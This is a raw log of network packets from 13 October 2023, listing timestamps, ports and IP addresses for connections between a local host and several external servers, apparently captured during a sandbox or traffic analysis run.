Oct 13, 2023 15:21:12.182734013 CEST	80	49738	187.18.108.158	192.168.2.5
Oct 13, 2023 15:21:12.182770967 CEST	80	49738	187.18.108.158	192.168.2.5
Oct 13, 2023 15:21:12.182780981 CEST	49738	80	192.168.2.5	187.18.108.158
Oct 13, 2023 15:21:12.182815075 CEST	49738	80	192.168.2.5	187.18.108.158
Oct 13, 2023 15:21:12.183273077 CEST	80	49738	187.18.108.158	192.168.2.5
Oct 13, 2023 15:21:12.183321953 CEST	49738	80	192.168.2.5	187.18.108.158
Oct 13, 2023 15:21:12.183357000 CEST	80	49738	187.18.108.158	192.168.2.5
Oct 13, 2023 15:21:12.183403015 CEST	49738	80	192.168.2.5	187.18.108.158
Oct 13, 2023 15:21:12.183425903 CEST	80	49738	187.18.108.158	192.168.2.5
Oct 13, 2023 15:21:12.183470011 CEST	49738	80	192.168.2.5	187.18.108.158
Oct 13, 2023 15:21:12.183518887 CEST	80	49738	187.18.108.158	192.168.2.5
Oct 13, 2023 15:21:12.183566093 CEST	49738	80	192.168.2.5	187.18.108.158
Oct 13, 2023 15:21:12.183621883 CEST	80	49738	187.18.108.158	192.168.2.5
Oct 13, 2023 15:21:12.183659077 CEST	80	49738	187.18.108.158	192.168.2.5
Oct 13, 2023 15:21:12.183669090 CEST	49738	80	192.168.2.5	187.18.108.158
Oct 13, 2023 15:21:12.183720112 CEST	49738	80	192.168.2.5	187.18.108.158
Oct 13, 2023 15:21:12.184099913 CEST	80	49738	187.18.108.158	192.168.2.5
Oct 13, 2023 15:21:12.184135914 CEST	80	49738	187.18.108.158	192.168.2.5
Oct 13, 2023 15:21:12.184150934 CEST	49738	80	192.168.2.5	187.18.108.158
Oct 13, 2023 15:21:12.184182882 CEST	49738	80	192.168.2.5	187.18.108.158
Oct 13, 2023 15:21:12.185324907 CEST	80	49738	187.18.108.158	192.168.2.5
Oct 13, 2023 15:21:12.185374975 CEST	49738	80	192.168.2.5	187.18.108.158
Oct 13, 2023 15:21:12.185584068 CEST	80	49738	187.18.108.158	192.168.2.5
Oct 13, 2023 15:21:12.185652971 CEST	49738	80	192.168.2.5	187.18.108.158
Oct 13, 2023 15:21:12.185743093 CEST	80	49738	187.18.108.158	192.168.2.5
Oct 13, 2023 15:21:12.185780048 CEST	80	49738	187.18.108.158	192.168.2.5
Oct 13, 2023 15:21:12.185791969 CEST	49738	80	192.168.2.5	187.18.108.158
Oct 13, 2023 15:21:12.185822010 CEST	49738	80	192.168.2.5	187.18.108.158
Oct 13, 2023 15:21:12.185846090 CEST	80	49738	187.18.108.158	192.168.2.5
Oct 13, 2023 15:21:12.185899973 CEST	49738	80	192.168.2.5	187.18.108.158
Oct 13, 2023 15:21:12.185942888 CEST	80	49738	187.18.108.158	192.168.2.5
Oct 13, 2023 15:21:12.185978889 CEST	80	49738	187.18.108.158	192.168.2.5
Oct 13, 2023 15:21:12.185987949 CEST	49738	80	192.168.2.5	187.18.108.158
Oct 13, 2023 15:21:12.186027050 CEST	49738	80	192.168.2.5	187.18.108.158
Oct 13, 2023 15:21:12.186085939 CEST	80	49738	187.18.108.158	192.168.2.5
Oct 13, 2023 15:21:12.186132908 CEST	49738	80	192.168.2.5	187.18.108.158
Oct 13, 2023 15:21:12.287564993 CEST	36011	49726	51.255.152.132	192.168.2.5
Oct 13, 2023 15:21:12.475624084 CEST	443	49739	172.67.213.185	192.168.2.5
Oct 13, 2023 15:21:12.475649118 CEST	443	49739	172.67.213.185	192.168.2.5
Oct 13, 2023 15:21:12.475668907 CEST	443	49739	172.67.213.185	192.168.2.5
Oct 13, 2023 15:21:12.475694895 CEST	443	49739	172.67.213.185	192.168.2.5
Oct 13, 2023 15:21:12.475713015 CEST	443	49739	172.67.213.185	192.168.2.5
Oct 13, 2023 15:21:12.475719929 CEST	49739	443	192.168.2.5	172.67.213.185
Oct 13, 2023 15:21:12.475728989 CEST	443	49739	172.67.213.185	192.168.2.5
Oct 13, 2023 15:21:12.475789070 CEST	443	49739	172.67.213.185	192.168.2.5
Oct 13, 2023 15:21:12.475826979 CEST	49739	443	192.168.2.5	172.67.213.185
Oct 13, 2023 15:21:12.475826979 CEST	49739	443	192.168.2.5	172.67.213.185
Oct 13, 2023 15:21:12.475931883 CEST	443	49739	172.67.213.185	192.168.2.5
Oct 13, 2023 15:21:12.475951910 CEST	443	49739	172.67.213.185	192.168.2.5
Oct 13, 2023 15:21:12.475980043 CEST	49739	443	192.168.2.5	172.67.213.185
Oct 13, 2023 15:21:12.475996017 CEST	443	49739	172.67.213.185	192.168.2.5
Oct 13, 2023 15:21:12.476038933 CEST	49739	443	192.168.2.5	172.67.213.185
Oct 13, 2023 15:21:12.476818085 CEST	443	49739	172.67.213.185	192.168.2.5
Oct 13, 2023 15:21:12.476923943 CEST	443	49739	172.67.213.185	192.168.2.5
Oct 13, 2023 15:21:12.476969957 CEST	49739	443	192.168.2.5	172.67.213.185
Oct 13, 2023 15:21:12.476984024 CEST	443	49739	172.67.213.185	192.168.2.5
Oct 13, 2023 15:21:12.477849960 CEST	49726	36011	192.168.2.5	51.255.152.132
Oct 13, 2023 15:21:12.477926970 CEST	443	49739	172.67.213.185	192.168.2.5
Oct 13, 2023 15:21:12.477946043 CEST	443	49739	172.67.213.185	192.168.2.5
Oct 13, 2023 15:21:12.477972984 CEST	49739	443	192.168.2.5	172.67.213.185
Oct 13, 2023 15:21:12.477987051 CEST	443	49739	172.67.213.185	192.168.2.5
Oct 13, 2023 15:21:12.478070974 CEST	49739	443	192.168.2.5	172.67.213.185
Oct 13, 2023 15:21:12.478082895 CEST	443	49739	172.67.213.185	192.168.2.5
Oct 13, 2023 15:21:12.478786945 CEST	443	49739	172.67.213.185	192.168.2.5
Oct 13, 2023 15:21:12.478815079 CEST	443	49739	172.67.213.185	192.168.2.5
Oct 13, 2023 15:21:12.478840113 CEST	49739	443	192.168.2.5	172.67.213.185
Oct 13, 2023 15:21:12.478856087 CEST	443	49739	172.67.213.185	192.168.2.5
Oct 13, 2023 15:21:12.478909969 CEST	49739	443	192.168.2.5	172.67.213.185
Oct 13, 2023 15:21:12.478928089 CEST	443	49739	172.67.213.185	192.168.2.5
Oct 13, 2023 15:21:12.479994059 CEST	443	49739	172.67.213.185	192.168.2.5
Oct 13, 2023 15:21:12.480017900 CEST	443	49739	172.67.213.185	192.168.2.5
Oct 13, 2023 15:21:12.480050087 CEST	49739	443	192.168.2.5	172.67.213.185
Oct 13, 2023 15:21:12.480062962 CEST	443	49739	172.67.213.185	192.168.2.5
Oct 13, 2023 15:21:12.480114937 CEST	49739	443	192.168.2.5	172.67.213.185
Oct 13, 2023 15:21:12.480127096 CEST	443	49739	172.67.213.185	192.168.2.5
Oct 13, 2023 15:21:12.480637074 CEST	443	49739	172.67.213.185	192.168.2.5
Oct 13, 2023 15:21:12.480659962 CEST	443	49739	172.67.213.185	192.168.2.5
Oct 13, 2023 15:21:12.480686903 CEST	49739	443	192.168.2.5	172.67.213.185
Oct 13, 2023 15:21:12.480700016 CEST	443	49739	172.67.213.185	192.168.2.5
Oct 13, 2023 15:21:12.480752945 CEST	49739	443	192.168.2.5	172.67.213.185
Oct 13, 2023 15:21:12.480765104 CEST	443	49739	172.67.213.185	192.168.2.5
Oct 13, 2023 15:21:12.481769085 CEST	443	49739	172.67.213.185	192.168.2.5
Oct 13, 2023 15:21:12.481812000 CEST	49739	443	192.168.2.5	172.67.213.185
Oct 13, 2023 15:21:12.481823921 CEST	443	49739	172.67.213.185	192.168.2.5
Oct 13, 2023 15:21:12.482995987 CEST	443	49739	172.67.213.185	192.168.2.5
Oct 13, 2023 15:21:12.483057976 CEST	443	49739	172.67.213.185	192.168.2.5
Oct 13, 2023 15:21:12.483067989 CEST	49739	443	192.168.2.5	172.67.213.185
Oct 13, 2023 15:21:12.483079910 CEST	443	49739	172.67.213.185	192.168.2.5
Oct 13, 2023 15:21:12.483134031 CEST	49739	443	192.168.2.5	172.67.213.185
Oct 13, 2023 15:21:12.483145952 CEST	443	49739	172.67.213.185	192.168.2.5
Oct 13, 2023 15:21:12.483333111 CEST	443	49739	172.67.213.185	192.168.2.5
Oct 13, 2023 15:21:12.483382940 CEST	49739	443	192.168.2.5	172.67.213.185
Oct 13, 2023 15:21:12.483393908 CEST	443	49739	172.67.213.185	192.168.2.5
Oct 13, 2023 15:21:12.483469963 CEST	443	49739	172.67.213.185	192.168.2.5
Oct 13, 2023 15:21:12.483503103 CEST	443	49739	172.67.213.185	192.168.2.5
Oct 13, 2023 15:21:12.483520031 CEST	49739	443	192.168.2.5	172.67.213.185
Oct 13, 2023 15:21:12.483534098 CEST	443	49739	172.67.213.185	192.168.2.5
Oct 13, 2023 15:21:12.483611107 CEST	49739	443	192.168.2.5	172.67.213.185
Oct 13, 2023 15:21:12.484500885 CEST	443	49739	172.67.213.185	192.168.2.5
Oct 13, 2023 15:21:12.485456944 CEST	443	49739	172.67.213.185	192.168.2.5
Oct 13, 2023 15:21:12.485529900 CEST	49739	443	192.168.2.5	172.67.213.185
Oct 13, 2023 15:21:12.485542059 CEST	443	49739	172.67.213.185	192.168.2.5
Oct 13, 2023 15:21:12.509910107 CEST	80	49738	187.18.108.158	192.168.2.5
Oct 13, 2023 15:21:12.510010004 CEST	49738	80	192.168.2.5	187.18.108.158
Oct 13, 2023 15:21:12.511090040 CEST	80	49738	187.18.108.158	192.168.2.5
Oct 13, 2023 15:21:12.511153936 CEST	49738	80	192.168.2.5	187.18.108.158
Oct 13, 2023 15:21:12.512094021 CEST	80	49738	187.18.108.158	192.168.2.5
Oct 13, 2023 15:21:12.512151957 CEST	49738	80	192.168.2.5	187.18.108.158
Oct 13, 2023 15:21:12.513567924 CEST	80	49738	187.18.108.158	192.168.2.5
Oct 13, 2023 15:21:12.513628960 CEST	49738	80	192.168.2.5	187.18.108.158
Oct 13, 2023 15:21:12.514576912 CEST	80	49738	187.18.108.158	192.168.2.5
Oct 13, 2023 15:21:12.514636040 CEST	49738	80	192.168.2.5	187.18.108.158
Oct 13, 2023 15:21:12.515598059 CEST	80	49738	187.18.108.158	192.168.2.5
Oct 13, 2023 15:21:12.515664101 CEST	49738	80	192.168.2.5	187.18.108.158
Oct 13, 2023 15:21:12.516546011 CEST	80	49738	187.18.108.158	192.168.2.5
Oct 13, 2023 15:21:12.516602993 CEST	49738	80	192.168.2.5	187.18.108.158
Oct 13, 2023 15:21:12.517806053 CEST	80	49738	187.18.108.158	192.168.2.5
Oct 13, 2023 15:21:12.517863035 CEST	49738	80	192.168.2.5	187.18.108.158
Oct 13, 2023 15:21:12.518557072 CEST	80	49738	187.18.108.158	192.168.2.5
Oct 13, 2023 15:21:12.518613100 CEST	49738	80	192.168.2.5	187.18.108.158
Oct 13, 2023 15:21:12.519545078 CEST	80	49738	187.18.108.158	192.168.2.5
Oct 13, 2023 15:21:12.519613028 CEST	49738	80	192.168.2.5	187.18.108.158
Oct 13, 2023 15:21:12.520540953 CEST	80	49738	187.18.108.158	192.168.2.5
Oct 13, 2023 15:21:12.520613909 CEST	49738	80	192.168.2.5	187.18.108.158
Oct 13, 2023 15:21:12.521584988 CEST	80	49738	187.18.108.158	192.168.2.5
Oct 13, 2023 15:21:12.521646976 CEST	49738	80	192.168.2.5	187.18.108.158
Oct 13, 2023 15:21:12.522556067 CEST	80	49738	187.18.108.158	192.168.2.5
Oct 13, 2023 15:21:12.522608042 CEST	49738	80	192.168.2.5	187.18.108.158
Oct 13, 2023 15:21:12.523621082 CEST	80	49738	187.18.108.158	192.168.2.5
Oct 13, 2023 15:21:12.523669004 CEST	49738	80	192.168.2.5	187.18.108.158
Oct 13, 2023 15:21:12.524049044 CEST	80	49738	187.18.108.158	192.168.2.5
Oct 13, 2023 15:21:12.524092913 CEST	49738	80	192.168.2.5	187.18.108.158
Oct 13, 2023 15:21:12.525054932 CEST	80	49738	187.18.108.158	192.168.2.5
Oct 13, 2023 15:21:12.525108099 CEST	49738	80	192.168.2.5	187.18.108.158
Oct 13, 2023 15:21:12.525580883 CEST	80	49738	187.18.108.158	192.168.2.5
Oct 13, 2023 15:21:12.525676966 CEST	49738	80	192.168.2.5	187.18.108.158
Oct 13, 2023 15:21:12.526051044 CEST	80	49738	187.18.108.158	192.168.2.5
Oct 13, 2023 15:21:12.526106119 CEST	49738	80	192.168.2.5	187.18.108.158
Oct 13, 2023 15:21:12.526551962 CEST	80	49738	187.18.108.158	192.168.2.5
Oct 13, 2023 15:21:12.526606083 CEST	49738	80	192.168.2.5	187.18.108.158
Oct 13, 2023 15:21:12.527117014 CEST	80	49738	187.18.108.158	192.168.2.5
Oct 13, 2023 15:21:12.527169943 CEST	49738	80	192.168.2.5	187.18.108.158
Oct 13, 2023 15:21:12.528290987 CEST	80	49738	187.18.108.158	192.168.2.5
Oct 13, 2023 15:21:12.528352022 CEST	49738	80	192.168.2.5	187.18.108.158
Oct 13, 2023 15:21:12.528548956 CEST	80	49738	187.18.108.158	192.168.2.5
Oct 13, 2023 15:21:12.528597116 CEST	49738	80	192.168.2.5	187.18.108.158
Oct 13, 2023 15:21:12.529063940 CEST	80	49738	187.18.108.158	192.168.2.5
Oct 13, 2023 15:21:12.529113054 CEST	49738	80	192.168.2.5	187.18.108.158
Oct 13, 2023 15:21:12.529532909 CEST	80	49738	187.18.108.158	192.168.2.5
Oct 13, 2023 15:21:12.529581070 CEST	49738	80	192.168.2.5	187.18.108.158
Oct 13, 2023 15:21:12.530076027 CEST	80	49738	187.18.108.158	192.168.2.5
Oct 13, 2023 15:21:12.530093908 CEST	80	49738	187.18.108.158	192.168.2.5
Oct 13, 2023 15:21:12.530127048 CEST	49738	80	192.168.2.5	187.18.108.158
Oct 13, 2023 15:21:12.530162096 CEST	49738	80	192.168.2.5	187.18.108.158
Oct 13, 2023 15:21:12.531052113 CEST	80	49738	187.18.108.158	192.168.2.5
Oct 13, 2023 15:21:12.531069040 CEST	80	49738	187.18.108.158	192.168.2.5
Oct 13, 2023 15:21:12.531122923 CEST	49738	80	192.168.2.5	187.18.108.158
Oct 13, 2023 15:21:12.531161070 CEST	49738	80	192.168.2.5	187.18.108.158
Oct 13, 2023 15:21:12.531573057 CEST	80	49738	187.18.108.158	192.168.2.5
Oct 13, 2023 15:21:12.531627893 CEST	49738	80	192.168.2.5	187.18.108.158
Oct 13, 2023 15:21:12.532110929 CEST	80	49738	187.18.108.158	192.168.2.5
Oct 13, 2023 15:21:12.532160044 CEST	49738	80	192.168.2.5	187.18.108.158
Oct 13, 2023 15:21:12.532593966 CEST	80	49738	187.18.108.158	192.168.2.5
Oct 13, 2023 15:21:12.532653093 CEST	49738	80	192.168.2.5	187.18.108.158
Oct 13, 2023 15:21:12.533080101 CEST	80	49738	187.18.108.158	192.168.2.5
Oct 13, 2023 15:21:12.533117056 CEST	80	49738	187.18.108.158	192.168.2.5
Oct 13, 2023 15:21:12.533130884 CEST	49738	80	192.168.2.5	187.18.108.158
Oct 13, 2023 15:21:12.533163071 CEST	49738	80	192.168.2.5	187.18.108.158
Oct 13, 2023 15:21:12.533565044 CEST	80	49738	187.18.108.158	192.168.2.5
Oct 13, 2023 15:21:12.533704996 CEST	49738	80	192.168.2.5	187.18.108.158
Oct 13, 2023 15:21:12.534111977 CEST	80	49738	187.18.108.158	192.168.2.5
Oct 13, 2023 15:21:12.534148932 CEST	80	49738	187.18.108.158	192.168.2.5
Oct 13, 2023 15:21:12.534168959 CEST	49738	80	192.168.2.5	187.18.108.158
Oct 13, 2023 15:21:12.534198999 CEST	49738	80	192.168.2.5	187.18.108.158
Oct 13, 2023 15:21:12.534609079 CEST	80	49738	187.18.108.158	192.168.2.5
Oct 13, 2023 15:21:12.534647942 CEST	80	49738	187.18.108.158	192.168.2.5
Oct 13, 2023 15:21:12.534667015 CEST	49738	80	192.168.2.5	187.18.108.158
Oct 13, 2023 15:21:12.534698963 CEST	49738	80	192.168.2.5	187.18.108.158
Oct 13, 2023 15:21:12.535603046 CEST	80	49738	187.18.108.158	192.168.2.5
Oct 13, 2023 15:21:12.535640001 CEST	80	49738	187.18.108.158	192.168.2.5
Oct 13, 2023 15:21:12.535672903 CEST	49738	80	192.168.2.5	187.18.108.158
Oct 13, 2023 15:21:12.535706043 CEST	49738	80	192.168.2.5	187.18.108.158
Oct 13, 2023 15:21:12.536050081 CEST	80	49738	187.18.108.158	192.168.2.5
Oct 13, 2023 15:21:12.536087036 CEST	80	49738	187.18.108.158	192.168.2.5
Oct 13, 2023 15:21:12.536101103 CEST	49738	80	192.168.2.5	187.18.108.158
Oct 13, 2023 15:21:12.536124945 CEST	80	49738	187.18.108.158	192.168.2.5
Oct 13, 2023 15:21:12.536132097 CEST	49738	80	192.168.2.5	187.18.108.158
Oct 13, 2023 15:21:12.536181927 CEST	49738	80	192.168.2.5	187.18.108.158
Oct 13, 2023 15:21:12.536587954 CEST	80	49738	187.18.108.158	192.168.2.5
Oct 13, 2023 15:21:12.536654949 CEST	49738	80	192.168.2.5	187.18.108.158
Oct 13, 2023 15:21:12.537082911 CEST	80	49738	187.18.108.158	192.168.2.5
Oct 13, 2023 15:21:12.537143946 CEST	49738	80	192.168.2.5	187.18.108.158
Oct 13, 2023 15:21:12.537153959 CEST	80	49738	187.18.108.158	192.168.2.5
Oct 13, 2023 15:21:12.537199974 CEST	49738	80	192.168.2.5	187.18.108.158
Oct 13, 2023 15:21:12.537545919 CEST	80	49738	187.18.108.158	192.168.2.5
Oct 13, 2023 15:21:12.537563086 CEST	80	49738	187.18.108.158	192.168.2.5
Oct 13, 2023 15:21:12.537599087 CEST	49738	80	192.168.2.5	187.18.108.158
Oct 13, 2023 15:21:12.537599087 CEST	49738	80	192.168.2.5	187.18.108.158
Oct 13, 2023 15:21:12.538089991 CEST	80	49738	187.18.108.158	192.168.2.5
Oct 13, 2023 15:21:12.538137913 CEST	49738	80	192.168.2.5	187.18.108.158
Oct 13, 2023 15:21:12.538562059 CEST	80	49738	187.18.108.158	192.168.2.5
Oct 13, 2023 15:21:12.538578987 CEST	80	49738	187.18.108.158	192.168.2.5
Oct 13, 2023 15:21:12.538594007 CEST	80	49738	187.18.108.158	192.168.2.5
Oct 13, 2023 15:21:12.538606882 CEST	49738	80	192.168.2.5	187.18.108.158
Oct 13, 2023 15:21:12.538636923 CEST	49738	80	192.168.2.5	187.18.108.158
Oct 13, 2023 15:21:12.538636923 CEST	49738	80	192.168.2.5	187.18.108.158
Oct 13, 2023 15:21:12.539064884 CEST	80	49738	187.18.108.158	192.168.2.5
Oct 13, 2023 15:21:12.539108992 CEST	80	49738	187.18.108.158	192.168.2.5
Oct 13, 2023 15:21:12.539115906 CEST	49738	80	192.168.2.5	187.18.108.158
Oct 13, 2023 15:21:12.539145947 CEST	49738	80	192.168.2.5	187.18.108.158
Oct 13, 2023 15:21:12.539165974 CEST	80	49738	187.18.108.158	192.168.2.5
Oct 13, 2023 15:21:12.539211035 CEST	49738	80	192.168.2.5	187.18.108.158
Oct 13, 2023 15:21:12.539535999 CEST	80	49738	187.18.108.158	192.168.2.5
Oct 13, 2023 15:21:12.539585114 CEST	49738	80	192.168.2.5	187.18.108.158
Oct 13, 2023 15:21:12.540033102 CEST	80	49738	187.18.108.158	192.168.2.5
Oct 13, 2023 15:21:12.540074110 CEST	80	49738	187.18.108.158	192.168.2.5
Oct 13, 2023 15:21:12.540076971 CEST	49738	80	192.168.2.5	187.18.108.158
Oct 13, 2023 15:21:12.540091038 CEST	80	49738	187.18.108.158	192.168.2.5
Oct 13, 2023 15:21:12.540128946 CEST	49738	80	192.168.2.5	187.18.108.158
Oct 13, 2023 15:21:12.540128946 CEST	49738	80	192.168.2.5	187.18.108.158
Oct 13, 2023 15:21:12.540673018 CEST	80	49738	187.18.108.158	192.168.2.5
Oct 13, 2023 15:21:12.540705919 CEST	80	49738	187.18.108.158	192.168.2.5
Oct 13, 2023 15:21:12.540721893 CEST	80	49738	187.18.108.158	192.168.2.5
Oct 13, 2023 15:21:12.540725946 CEST	49738	80	192.168.2.5	187.18.108.158
Oct 13, 2023 15:21:12.540755987 CEST	49738	80	192.168.2.5	187.18.108.158
Oct 13, 2023 15:21:12.540781021 CEST	49738	80	192.168.2.5	187.18.108.158
Oct 13, 2023 15:21:12.541028976 CEST	80	49738	187.18.108.158	192.168.2.5
Oct 13, 2023 15:21:12.541074038 CEST	49738	80	192.168.2.5	187.18.108.158
Oct 13, 2023 15:21:12.541462898 CEST	443	49736	45.130.41.106	192.168.2.5
Oct 13, 2023 15:21:12.541472912 CEST	443	49736	45.130.41.106	192.168.2.5
Oct 13, 2023 15:21:12.541500092 CEST	443	49736	45.130.41.106	192.168.2.5
Oct 13, 2023 15:21:12.541516066 CEST	80	49738	187.18.108.158	192.168.2.5
Oct 13, 2023 15:21:12.541538000 CEST	49736	443	192.168.2.5	45.130.41.106
Oct 13, 2023 15:21:12.541562080 CEST	443	49736	45.130.41.106	192.168.2.5
Oct 13, 2023 15:21:12.541582108 CEST	49736	443	192.168.2.5	45.130.41.106
Oct 13, 2023 15:21:12.541585922 CEST	80	49738	187.18.108.158	192.168.2.5
Oct 13, 2023 15:21:12.541585922 CEST	49738	80	192.168.2.5	187.18.108.158
Oct 13, 2023 15:21:12.541604996 CEST	49736	443	192.168.2.5	45.130.41.106
Oct 13, 2023 15:21:12.541635990 CEST	49738	80	192.168.2.5	187.18.108.158
Oct 13, 2023 15:21:12.541682005 CEST	80	49738	187.18.108.158	192.168.2.5
Oct 13, 2023 15:21:12.541724920 CEST	49738	80	192.168.2.5	187.18.108.158
Oct 13, 2023 15:21:12.542043924 CEST	80	49738	187.18.108.158	192.168.2.5
Oct 13, 2023 15:21:12.542073965 CEST	80	49738	187.18.108.158	192.168.2.5
Oct 13, 2023 15:21:12.542093992 CEST	80	49738	187.18.108.158	192.168.2.5
Oct 13, 2023 15:21:12.542104006 CEST	49738	80	192.168.2.5	187.18.108.158
Oct 13, 2023 15:21:12.542124987 CEST	49738	80	192.168.2.5	187.18.108.158
Oct 13, 2023 15:21:12.542145014 CEST	49738	80	192.168.2.5	187.18.108.158
Oct 13, 2023 15:21:12.542552948 CEST	443	49736	45.130.41.106	192.168.2.5
Oct 13, 2023 15:21:12.542570114 CEST	443	49736	45.130.41.106	192.168.2.5
Oct 13, 2023 15:21:12.542634010 CEST	49736	443	192.168.2.5	45.130.41.106
Oct 13, 2023 15:21:12.542640924 CEST	443	49736	45.130.41.106	192.168.2.5
Oct 13, 2023 15:21:12.542679071 CEST	49736	443	192.168.2.5	45.130.41.106
Oct 13, 2023 15:21:12.559611082 CEST	80	49738	187.18.108.158	192.168.2.5
Oct 13, 2023 15:21:12.559681892 CEST	49738	80	192.168.2.5	187.18.108.158
Oct 13, 2023 15:21:12.560611963 CEST	80	49738	187.18.108.158	192.168.2.5
Oct 13, 2023 15:21:12.560669899 CEST	49738	80	192.168.2.5	187.18.108.158
Oct 13, 2023 15:21:12.561018944 CEST	80	49738	187.18.108.158	192.168.2.5
Oct 13, 2023 15:21:12.561065912 CEST	49738	80	192.168.2.5	187.18.108.158
Oct 13, 2023 15:21:12.561578035 CEST	80	49738	187.18.108.158	192.168.2.5
Oct 13, 2023 15:21:12.561593056 CEST	80	49738	187.18.108.158	192.168.2.5
Oct 13, 2023 15:21:12.561640024 CEST	49738	80	192.168.2.5	187.18.108.158
Oct 13, 2023 15:21:12.561640024 CEST	49738	80	192.168.2.5	187.18.108.158
Oct 13, 2023 15:21:12.562582016 CEST	80	49738	187.18.108.158	192.168.2.5
Oct 13, 2023 15:21:12.562597036 CEST	80	49738	187.18.108.158	192.168.2.5
Oct 13, 2023 15:21:12.562633991 CEST	49738	80	192.168.2.5	187.18.108.158
Oct 13, 2023 15:21:12.562668085 CEST	49738	80	192.168.2.5	187.18.108.158
Oct 13, 2023 15:21:12.563564062 CEST	80	49738	187.18.108.158	192.168.2.5
Oct 13, 2023 15:21:12.563580036 CEST	80	49738	187.18.108.158	192.168.2.5
Oct 13, 2023 15:21:12.563617945 CEST	49738	80	192.168.2.5	187.18.108.158
Oct 13, 2023 15:21:12.563649893 CEST	49738	80	192.168.2.5	187.18.108.158
Oct 13, 2023 15:21:12.571103096 CEST	80	49738	187.18.108.158	192.168.2.5
Oct 13, 2023 15:21:12.571158886 CEST	49738	80	192.168.2.5	187.18.108.158
Oct 13, 2023 15:21:12.572098017 CEST	80	49738	187.18.108.158	192.168.2.5
Oct 13, 2023 15:21:12.572153091 CEST	49738	80	192.168.2.5	187.18.108.158
Oct 13, 2023 15:21:12.572556973 CEST	80	49738	187.18.108.158	192.168.2.5
Oct 13, 2023 15:21:12.572604895 CEST	49738	80	192.168.2.5	187.18.108.158
Oct 13, 2023 15:21:12.574094057 CEST	80	49738	187.18.108.158	192.168.2.5
Oct 13, 2023 15:21:12.574147940 CEST	49738	80	192.168.2.5	187.18.108.158
Oct 13, 2023 15:21:12.575161934 CEST	80	49738	187.18.108.158	192.168.2.5
Oct 13, 2023 15:21:12.575218916 CEST	49738	80	192.168.2.5	187.18.108.158
Oct 13, 2023 15:21:12.575542927 CEST	80	49738	187.18.108.158	192.168.2.5
Oct 13, 2023 15:21:12.575604916 CEST	49738	80	192.168.2.5	187.18.108.158
Oct 13, 2023 15:21:12.576606035 CEST	80	49738	187.18.108.158	192.168.2.5
Oct 13, 2023 15:21:12.576658010 CEST	49738	80	192.168.2.5	187.18.108.158
Oct 13, 2023 15:21:12.577066898 CEST	80	49738	187.18.108.158	192.168.2.5
Oct 13, 2023 15:21:12.577126980 CEST	49738	80	192.168.2.5	187.18.108.158
Oct 13, 2023 15:21:12.577601910 CEST	80	49738	187.18.108.158	192.168.2.5
Oct 13, 2023 15:21:12.577651978 CEST	49738	80	192.168.2.5	187.18.108.158
Oct 13, 2023 15:21:12.577668905 CEST	80	49738	187.18.108.158	192.168.2.5
Oct 13, 2023 15:21:12.577716112 CEST	49738	80	192.168.2.5	187.18.108.158
Oct 13, 2023 15:21:12.578583002 CEST	80	49738	187.18.108.158	192.168.2.5
Oct 13, 2023 15:21:12.578644037 CEST	49738	80	192.168.2.5	187.18.108.158
Oct 13, 2023 15:21:12.579096079 CEST	80	49738	187.18.108.158	192.168.2.5
Oct 13, 2023 15:21:12.579148054 CEST	49738	80	192.168.2.5	187.18.108.158
Oct 13, 2023 15:21:12.579576969 CEST	80	49738	187.18.108.158	192.168.2.5
Oct 13, 2023 15:21:12.579627037 CEST	49738	80	192.168.2.5	187.18.108.158
Oct 13, 2023 15:21:12.580117941 CEST	80	49738	187.18.108.158	192.168.2.5
Oct 13, 2023 15:21:12.580149889 CEST	80	49738	187.18.108.158	192.168.2.5
Oct 13, 2023 15:21:12.580168009 CEST	49738	80	192.168.2.5	187.18.108.158
Oct 13, 2023 15:21:12.580199957 CEST	49738	80	192.168.2.5	187.18.108.158
Oct 13, 2023 15:21:12.580590963 CEST	80	49738	187.18.108.158	192.168.2.5
Oct 13, 2023 15:21:12.580622911 CEST	80	49738	187.18.108.158	192.168.2.5
Oct 13, 2023 15:21:12.580651045 CEST	49738	80	192.168.2.5	187.18.108.158
Oct 13, 2023 15:21:12.580687046 CEST	49738	80	192.168.2.5	187.18.108.158
Oct 13, 2023 15:21:12.581568956 CEST	80	49738	187.18.108.158	192.168.2.5
Oct 13, 2023 15:21:12.581630945 CEST	49738	80	192.168.2.5	187.18.108.158
Oct 13, 2023 15:21:12.582135916 CEST	80	49738	187.18.108.158	192.168.2.5
Oct 13, 2023 15:21:12.582169056 CEST	80	49738	187.18.108.158	192.168.2.5
Oct 13, 2023 15:21:12.582185030 CEST	49738	80	192.168.2.5	187.18.108.158
Oct 13, 2023 15:21:12.582215071 CEST	49738	80	192.168.2.5	187.18.108.158
Oct 13, 2023 15:21:12.582597971 CEST	80	49738	187.18.108.158	192.168.2.5
Oct 13, 2023 15:21:12.582653999 CEST	49738	80	192.168.2.5	187.18.108.158
Oct 13, 2023 15:21:12.583132029 CEST	80	49738	187.18.108.158	192.168.2.5
Oct 13, 2023 15:21:12.583164930 CEST	80	49738	187.18.108.158	192.168.2.5
Oct 13, 2023 15:21:12.583183050 CEST	49738	80	192.168.2.5	187.18.108.158
Oct 13, 2023 15:21:12.583214045 CEST	49738	80	192.168.2.5	187.18.108.158
Oct 13, 2023 15:21:12.583576918 CEST	80	49738	187.18.108.158	192.168.2.5
Oct 13, 2023 15:21:12.583627939 CEST	49738	80	192.168.2.5	187.18.108.158
Oct 13, 2023 15:21:12.584135056 CEST	80	49738	187.18.108.158	192.168.2.5
Oct 13, 2023 15:21:12.584183931 CEST	80	49738	187.18.108.158	192.168.2.5
Oct 13, 2023 15:21:12.584187031 CEST	49738	80	192.168.2.5	187.18.108.158
Oct 13, 2023 15:21:12.584232092 CEST	49738	80	192.168.2.5	187.18.108.158
Oct 13, 2023 15:21:12.584556103 CEST	80	49738	187.18.108.158	192.168.2.5
Oct 13, 2023 15:21:12.584604979 CEST	49738	80	192.168.2.5	187.18.108.158
Oct 13, 2023 15:21:12.585083008 CEST	80	49738	187.18.108.158	192.168.2.5
Oct 13, 2023 15:21:12.585114956 CEST	80	49738	187.18.108.158	192.168.2.5
Oct 13, 2023 15:21:12.585134029 CEST	49738	80	192.168.2.5	187.18.108.158
Oct 13, 2023 15:21:12.585165977 CEST	49738	80	192.168.2.5	187.18.108.158
Oct 13, 2023 15:21:12.585594893 CEST	80	49738	187.18.108.158	192.168.2.5
Oct 13, 2023 15:21:12.585645914 CEST	49738	80	192.168.2.5	187.18.108.158
Oct 13, 2023 15:21:12.586116076 CEST	80	49738	187.18.108.158	192.168.2.5
Oct 13, 2023 15:21:12.586148024 CEST	80	49738	187.18.108.158	192.168.2.5
Oct 13, 2023 15:21:12.586169004 CEST	49738	80	192.168.2.5	187.18.108.158
